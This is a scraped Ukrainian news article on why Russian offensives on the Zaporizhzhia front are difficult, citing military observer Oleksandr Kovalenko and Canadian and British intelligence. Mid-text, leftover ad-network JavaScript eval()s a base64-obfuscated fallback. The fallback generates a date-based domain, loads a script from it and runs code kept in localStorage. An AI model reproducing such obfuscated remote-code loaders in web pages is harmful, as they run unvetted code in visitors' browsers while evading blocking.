Чому РФ складно та небезпечно наступати на Запорізькому напрямку (КАРТА)

Військовий експерт оцінив можливості наступу російських окупантів на Запорізькому напрямку та пояснив, чому ворогові складно та небезпечно вести будь-які наступальні дії на Півдні.

Про це інформує Акцент із посиланням на Telegram-канал військового оглядача Олександра Коваленка.

Як зазначив експерт, станом на сьогодні ЗСУ можуть готувати контрнаступ на 3 локаціях:

Лівобережна Херсонщина;Запорізька область;Луганщина.

При цьому на Донецькому напрямку ще довгий час буде ґрунтовна оборона, а звільнення Криму не можливе без звільнення Півдня. Також, як зазначив Коваленко, російські окупанти можуть вести наступальні дії лише на одному плацдармі — Донецькій області, а «решта плацдармів для них у разі наступальної операції стане майданчиком для стрибка в м’ясорубку».

Чим небезпечний для РФ наступ на Запорізькому напрямку?

Як зазначив Коваленко, на сьогоднішній день на Південному плацдармі РОВ зосередили підрозділи 8, 49, 58 ОВА, 22 АК, 35, 36 ОВА ВВО, 3 АК та інші, кількісно — до 30 БТГР, основна частина яких зосереджена в трикутнику Василівка-Токмак-Мелітополь. Так, ворог регулярно демонструє готовність до наступальних дій, особливо у напрямку Оріхів та Гуляйполі.

Спроби наступу армії РФ на Запорізькому напрямку.
Оновлена карта Deep State станом на ранок 21 січня

На даний момент ворог отримує прийнятне забезпечення на цьому напрямку. Однак, на думку оглядача, у разі активних наступальних дій у противника різко зростуть потреби у забезпеченні, яке постачається через окупований Крим та єдину логістичну артерію – Кримський міст. Так, Коваленко зазначає, що ресурсу транзитного вузла ТОТ Криму «вистачить не більше ніж на 2 тижні активних наступальних дій», після чого ворог швидко видихнеться на напрямку. Фактично, як підсумував експерт, «будь-яка активність, чи то наступальна, чи оборонна», для окупантів на Запорізькому напрямку небажана.

«(…) Але варто їм вийти зі стану спокою і перейти в наступ, потреби різко зростуть, а ресурсу транзитного вузла ТОТ Криму вистачить не більше ніж на 2 тижні активних наступальних дій. на цьому плацдармі і…І все. Прощавай Південний плацдарм. Росіяни втрачають контроль над Півднем з термоядерним прискоренням. З цього можна зробити висновок, що будь-яка активність на Півдні для РОВ буде самогубною. І не тільки РОВ, адже у разі контрнаступу ЗСУ потреба у МТО у росіян так само зросте, оскільки вони змушені будуть перейти в оборону, що так само збільшує витрату всього і вся. Тобто будь-яка активність, чи то наступальна, чи оборонна, для РОВ тут небажана», — зазначив Олександр Коваленко. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

РФ не має ресурсів для наступу на Запорізькому напрямку

Водночас, за інформацією розвідки Канади, країна-агресора не має ресурсів для наступу на цьому напрямі: як зазначено в прес-службі розвідки, росіяни погано забезпечені і неправильно навчені, тому не зможуть вести успішний наступ уздовж Запорізького фронту протягом кількох місяців.

«Росія витрачає велику кількість ресурсів на спроби захоплення додаткових територій на Донбасі. Поки ЗСУ завдають окупантам дуже великих втрат, Росія отримала незначні територіальні досягнення», — йдеться у повідомленні.

Скріншот

Так, лише за останню добу було орієнтовно знищено 860 окупантів.

Також, як зазначили у розвідці Британії, на півдні, у Запорізькій області, обидві сторони зосередили значні сили, «які вели артилерійські перестрілки, але уникали масштабних наступальних дій».

Скріншот

До речі, як раніше інформував Акцент, за останньою інформацією ворог робить спроби наступу в районі населеного пункту Оріхів Запорізької області: так, раніше в Генштабі опублікували свіже відео зупинки безуспішного наступу росіян на Запорізькому напрямку, в результаті якого було ліквідовано 30 окупантів і 3 ворожих танки.

Опубліковано відео зупинки наступу росіян на Запоріжжі

Тематичне зображення – з відкритих джерел. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/chomu-rf-skladno-ta-nebezpechno-nastupati-na-zaporizkomu-napryamku-karta/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top